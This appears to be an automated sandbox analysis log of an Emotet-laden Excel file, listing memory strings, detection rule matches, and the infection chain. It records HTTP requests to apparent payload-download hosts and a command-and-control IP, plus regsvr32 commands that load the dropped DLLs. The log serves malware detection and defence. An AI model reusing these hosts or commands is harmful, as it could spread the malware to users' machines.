Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://outlook.office365.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://outlook.office365.com/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://pages.store.office.com/review/query
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://powerlift.acompli.net
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://roaming.edog.
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://settings.outlook.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://shell.suite.office.com:1443
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://skyapi.live.net/Activity/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://staging.cortana.ai
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://store.office.cn/addinstemplate
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://store.office.de/addinstemplate
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://tasks.office.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://web.microsoftstream.com/video/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://webshell.suite.office.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://wus2.contentsync.
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://wus2.pagecontentsync.
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://www.odwebp.svc.ms
Source: unknown HTTP traffic detected: POST /tkafmhcgcid/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedContent-Length: 284Host: 182.162.143.56
Source: unknown DNS traffic detected: queries for: datie-tw.com
Source: global traffic HTTP traffic detected: GET /img/O8G0RDZj7MYCuJyPoP/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: datie-tw.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cgi-bin/WFFcGx/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: copunupo.ac.zmConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /upload/VaOfWEb3pW76UO/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sbm.xinmoshiwang.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wp-admin/4cChao/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: ly.yjlianyi.topConnection: Keep-Alive
Source: unknown HTTPS traffic detected: 175.98.167.165:443 -> 192.168.2.3:49697 version: TLS 1.2
Source: unknown HTTPS traffic detected: 41.63.0.22:443 -> 192.168.2.3:49701 version: TLS 1.2
Source: unknown HTTPS traffic detected: 182.162.143.56:443 -> 192.168.2.3:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 182.162.143.56:443 -> 192.168.2.3:49713 version: TLS 1.2

E-Banking Fraud

Source: Yara match File source: 0000000C.00000002.2414304563.00000000009BB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2414500170.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 8.2.regsvr32.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.regsvr32.exe.980000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1290019980.0000000000980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: 8.2.regsvr32.exe.980000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Emotet_db7d33fa Author: unknown
Source: 8.2.regsvr32.exe.980000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Emotet_db7d33fa Author: unknown
Source: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Emotet_db7d33fa Author: unknown
Source: 00000008.00000002.1290019980.0000000000980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Emotet_db7d33fa Author: unknown
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\98S549LJ\o0oHPECmC0WPIXcvQPJOXzFOO7w00z7mkDO[1].dll
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE File created: C:\Users\user\elv2.ooocccxxx
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CE8D676K\EvvmhfKiKFhKrSuHfBq[1].dll
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE File created: C:\Users\user\elv3.ooocccxxx
Source: PO0000001552.xls, type: SAMPLE Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: 8.2.regsvr32.exe.980000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Emotet_db7d33fa reference_sample = 08c23400ff546db41f9ddbbb19fa75519826744dde3b3afb38f3985266577afc, os = windows, severity = x86, creation_date = 2022-05-09, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = eac196154ab1ad636654c966e860dcd5763c50d7b8221dbbc7769c879daf02fd, id = db7d33fa-e50c-4c59-ab92-edb74aac87c9, last_modified = 2022-06-09
Source: 8.2.regsvr32.exe.980000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Emotet_db7d33fa reference_sample = 08c23400ff546db41f9ddbbb19fa75519826744dde3b3afb38f3985266577afc, os = windows, severity = x86, creation_date = 2022-05-09, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = eac196154ab1ad636654c966e860dcd5763c50d7b8221dbbc7769c879daf02fd, id = db7d33fa-e50c-4c59-ab92-edb74aac87c9, last_modified = 2022-06-09
Source: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Emotet_db7d33fa reference_sample = 08c23400ff546db41f9ddbbb19fa75519826744dde3b3afb38f3985266577afc, os = windows, severity = x86, creation_date = 2022-05-09, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = eac196154ab1ad636654c966e860dcd5763c50d7b8221dbbc7769c879daf02fd, id = db7d33fa-e50c-4c59-ab92-edb74aac87c9, last_modified = 2022-06-09
Source: 00000008.00000002.1290019980.0000000000980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Emotet_db7d33fa reference_sample = 08c23400ff546db41f9ddbbb19fa75519826744dde3b3afb38f3985266577afc, os = windows, severity = x86, creation_date = 2022-05-09, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = eac196154ab1ad636654c966e860dcd5763c50d7b8221dbbc7769c879daf02fd, id = db7d33fa-e50c-4c59-ab92-edb74aac87c9, last_modified = 2022-06-09
Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\system32\XEzXl\
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00007FFD2B07DBCC 8_2_00007FFD2B07DBCC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00007FFD2B07C420 8_2_00007FFD2B07C420
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00007FFD2B06EAB8 8_2_00007FFD2B06EAB8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00007FFD2B06732C 8_2_00007FFD2B06732C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00007FFD2B0719D4 8_2_00007FFD2B0719D4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00007FFD2B07C0E8 8_2_00007FFD2B07C0E8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00007FFD2B07D118 8_2_00007FFD2B07D118
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00007FFD2B06EFA4 8_2_00007FFD2B06EFA4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00007FFD2B07C7C0 8_2_00007FFD2B07C7C0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00007FFD2B06D720 8_2_00007FFD2B06D720
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00007FFD2B074574 8_2_00007FFD2B074574
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00007FFD2B065D68 8_2_00007FFD2B065D68
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00007FFD2B0715B0 8_2_00007FFD2B0715B0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00007FFD2B073CE8 8_2_00007FFD2B073CE8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_009B0000 8_2_009B0000
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180001864 8_2_0000000180001864
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180008470 8_2_0000000180008470
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800274F4 8_2_00000001800274F4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180012108 8_2_0000000180012108
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180027AE4 8_2_0000000180027AE4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180007F20 8_2_0000000180007F20
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180019F38 8_2_0000000180019F38
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000EB3C 8_2_000000018000EB3C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000FBB4 8_2_000000018000FBB4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180001FE8 8_2_0000000180001FE8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800197F8 8_2_00000001800197F8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180012BFC 8_2_0000000180012BFC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001EBFC 8_2_000000018001EBFC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180008BFC 8_2_0000000180008BFC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180003800 8_2_0000000180003800
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180007014 8_2_0000000180007014
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180015020 8_2_0000000180015020
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018002A43C 8_2_000000018002A43C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000E850 8_2_000000018000E850
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180002C5C 8_2_0000000180002C5C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180013468 8_2_0000000180013468
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001A470 8_2_000000018001A470
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180016C70 8_2_0000000180016C70
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180014C80 8_2_0000000180014C80
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000B888 8_2_000000018000B888
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180011C90 8_2_0000000180011C90
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180021894 8_2_0000000180021894
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180021094 8_2_0000000180021094
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180026098 8_2_0000000180026098
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180005498 8_2_0000000180005498
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180017CB0 8_2_0000000180017CB0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180025CB8 8_2_0000000180025CB8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000CCB8 8_2_000000018000CCB8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800094BC 8_2_00000001800094BC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800180C8 8_2_00000001800180C8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001B4CC 8_2_000000018001B4CC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800278D8 8_2_00000001800278D8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180003CD8 8_2_0000000180003CD8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001E8E4 8_2_000000018001E8E4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800258E8 8_2_00000001800258E8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800138F0 8_2_00000001800138F0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180002504 8_2_0000000180002504
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001C108 8_2_000000018001C108
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000E50C 8_2_000000018000E50C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180014514 8_2_0000000180014514
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180026518 8_2_0000000180026518
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180015120 8_2_0000000180015120
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180015524 8_2_0000000180015524
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180007130 8_2_0000000180007130
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180008D40 8_2_0000000180008D40
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018002C144 8_2_000000018002C144
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000795C 8_2_000000018000795C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180001560 8_2_0000000180001560
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001C57C 8_2_000000018001C57C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000E97C 8_2_000000018000E97C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180003990 8_2_0000000180003990
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800099A0 8_2_00000001800099A0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800299A4 8_2_00000001800299A4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000B9B4 8_2_000000018000B9B4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180013DBC 8_2_0000000180013DBC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001FDC0 8_2_000000018001FDC0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800131C8 8_2_00000001800131C8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000D1CC 8_2_000000018000D1CC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800029CC 8_2_00000001800029CC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000B5CC 8_2_000000018000B5CC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800245D0 8_2_00000001800245D0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180014DD0 8_2_0000000180014DD0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800191E0 8_2_00000001800191E0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000FDE4 8_2_000000018000FDE4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001A9F0 8_2_000000018001A9F0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800055F4 8_2_00000001800055F4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180019E08 8_2_0000000180019E08
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000320C 8_2_000000018000320C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180011A19 8_2_0000000180011A19
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001F624 8_2_000000018001F624
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180003E2C 8_2_0000000180003E2C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180013634 8_2_0000000180013634
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001BA34 8_2_000000018001BA34
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018002BA3C 8_2_000000018002BA3C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180015240 8_2_0000000180015240
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180017A40 8_2_0000000180017A40
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180007658 8_2_0000000180007658
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000C65C 8_2_000000018000C65C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000FA60 8_2_000000018000FA60
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180025668 8_2_0000000180025668
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180006668 8_2_0000000180006668
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180008E68 8_2_0000000180008E68
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001B670 8_2_000000018001B670
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001BE70 8_2_000000018001BE70
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000A678 8_2_000000018000A678
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001A27C 8_2_000000018001A27C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180025280 8_2_0000000180025280
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180005684 8_2_0000000180005684
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000CE88 8_2_000000018000CE88
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180021E8C 8_2_0000000180021E8C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018002228C 8_2_000000018002228C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001428C 8_2_000000018001428C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180018698 8_2_0000000180018698
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180023E9C 8_2_0000000180023E9C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800016A0 8_2_00000001800016A0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800072A4 8_2_00000001800072A4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000D6A4 8_2_000000018000D6A4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018002B6AC 8_2_000000018002B6AC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800026B0 8_2_00000001800026B0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000CAB4 8_2_000000018000CAB4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000BAD0 8_2_000000018000BAD0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001EEE0 8_2_000000018001EEE0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180025B0C 8_2_0000000180025B0C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180021B10 8_2_0000000180021B10
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180003310 8_2_0000000180003310
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000E310 8_2_000000018000E310
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180027F1C 8_2_0000000180027F1C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001FF28 8_2_000000018001FF28
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180011F30 8_2_0000000180011F30
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180010330 8_2_0000000180010330
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000C334 8_2_000000018000C334
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180015344 8_2_0000000180015344
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180003F54 8_2_0000000180003F54
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180006B54 8_2_0000000180006B54
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180029F58 8_2_0000000180029F58
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001A764 8_2_000000018001A764
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180013B6C 8_2_0000000180013B6C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001337C 8_2_000000018001337C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180009B84 8_2_0000000180009B84
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180024788 8_2_0000000180024788
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001F388 8_2_000000018001F388
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180019B88 8_2_0000000180019B88
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000C788 8_2_000000018000C788
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001238C 8_2_000000018001238C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180023B90 8_2_0000000180023B90
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001BB98 8_2_000000018001BB98
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018002B39C 8_2_000000018002B39C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000B3A4 8_2_000000018000B3A4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180010BAE 8_2_0000000180010BAE
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800293B4 8_2_00000001800293B4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800167C4 8_2_00000001800167C4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000AFD4 8_2_000000018000AFD4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000BBD4 8_2_000000018000BBD4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800137DC 8_2_00000001800137DC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000ABDC 8_2_000000018000ABDC
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc.dll
Source: PO0000001552.xls Virustotal: Detection: 66%
Source: C:\Windows\System32\regsvr32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\PO0000001552.xls
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\elv1.ooocccxxx
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\elv2.ooocccxxx
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\XEzXl\JZazaZgAOY.dll"
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\elv3.ooocccxxx
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\GanZhs\FrugrCuQjdEr.dll"
